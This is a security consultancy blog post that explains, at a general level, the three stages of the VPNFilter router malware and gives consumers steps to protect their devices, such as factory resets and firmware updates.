VPNFilter Malware – All You Need To Know

Josh Raduka, Senior Consultant, SecureITsource, Inc.

Nearly a month ago today, malware with ties to the Russian government, known as VPNFilter, was released into the “wild”. Suspected to be state sponsored or affiliated, this malware infected what was originally thought to be 500,000 networking devices, but later reports clock the number closer to one million! Its reach has spanned across 54 different countries infecting devices manufactured by Netgear, TP-LINK, Lyksys, and MikroTik with ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE joining the target list shortly after. A complete device list by Cisco Talos can be found here.

The malware infects SOHO (small home-office) network devices, like routers, and NAS (Network-Attached Storage). Yep, that thing in the corner of the room with the flashy lights could be infected. These devices typically sit on the perimeter of most home network and most don’t always contain the most sophisticated IPS (Intrusion Prevention System) or virus protection software compared to what is found in the enterprise.

Recent research on the malware by Cisco Talos concludes that it has more advanced capabilities than other malware of this nature and unique survival skills, making it unlike the rest. Composed of three stages, one of them deadly (for your router), the malware has yet to be a forgotten threat. Even with the FBI’s recommendations for consumers to reboot their routers, that won’t completely cleanse your device of the VPNFilter malware.


Stage 1: Once infected, the device relies on command and control mechanisms to search for the dynamic IP address of the stage 2 deployment server. The infected devices would reach out to photobucket or a ToKnowAll[.]com domain to pull down a photo. The ToKnowAll[.]com domain has been seized by the FBI. If both attempts fail, a listener is opened that waits for malicious packet with an IP address used for stage 2.

Stage 2: Unlike the first stage, stage 2 and 3 cannot persist through a reboot. However, these stages will start again after rebooting. As Talos states, this stage “possesses capabilities that we have come to expect in a workhorse intelligence-collection platform, such as file collection, command execution, data exfiltration and device management.” Basically, it’s the stage enabling attackers to execute commands and steal data. Research has shown VPNFilter is not trying to collect all data passing through the routers, but narrowing its search for website credentials and Modbus SCADA (Supervisory Control and Data Acquisition) protocols. Modbus is an open-source, serial communication protocol used for transmitting information between electronic devices. Variations of stage 2 were discovered included a destructive capability linked to stage 3 that turns the victim’s device into a paperweight, probably killing the flashy lights. The larger threat is that the stage 2 self-destructive switch can be triggered on a massive scale, detaching hundreds of thousands of people from the internet simultaneously. That means no more online shopping. Well, maybe that is a good thing for some.

Stage 3: Multi-modular stage 3 serves as plugins for the stage 2 malware, adding functionality. This stage includes a module responsible for injecting malicious content into web traffic as it passes through the infected network device, but not before attempting to downgrade encrypted HTTPS traffic to HTTP in clear text. Named the “ssler” module is the endpoint exploitation module. It allows the actor, or infected device, to deliver exploits to endpoints via a man-in-the-middle capability. In other words, network traffic can be intercepted over port 80 and injected with malicious code unbeknownst to the user. Another module, the packet sniffer not only seeks out TCP packets larger than 150 bytes or larger and basic authentication, but also monitors SCADA communication as mentioned above. Another important functionality about stage 3 is the fact it has the ability to communicate over TOR, so everything the router is stealing is encrypted over the internet.

How can you protect yourself?

Defending against this type of attack may be difficult due to the defensive abilities of the devices impacted. Also, there isn’t a simple method to confirm your router is infected. Despite these limitations to counter or defend against this malware, here are some recommendations and some general security best practices to keep you safe.

  • While this could be a pain, resetting your router back to factory defaults is the closest guarantee you have to removing any traces of VPNFilter malware.
  • Reboot your router. Your ISP may have already performed a remote reboot, but rebooting the device yourself will ensure this task is complete. Simply unplug the power supply for 30 seconds then plug it back in. However, if infected, this will not completely wipe out VPNFilter.
  • Contact the manufacturer or visit the manufacturer’s website for preventative instructions and to ensure all patches have been applied and you’re running the latest firmware, especially if your device is on the list.
  • Always change the default username and password for administering your router.
  • Do not leave remote administration enabled, unless required.


While individuals, teams, and security minded organizations continue to research the effects of this advanced malware, it is important to take note of the steps above and keep an eye on the growing list of manufacturers and devices. This will certainly not be the last type of malware of this magnitude we see, so it is important to stay current and informed regarding these attacks.


Like our content? Meet some of SecureITSource’s CyberArk experts at CyberArk Impact 2018, July 16-18th in Boston.

Looking for a new opportunity? We’re hiring experts for multiple IaM arenas and would love to speak with you!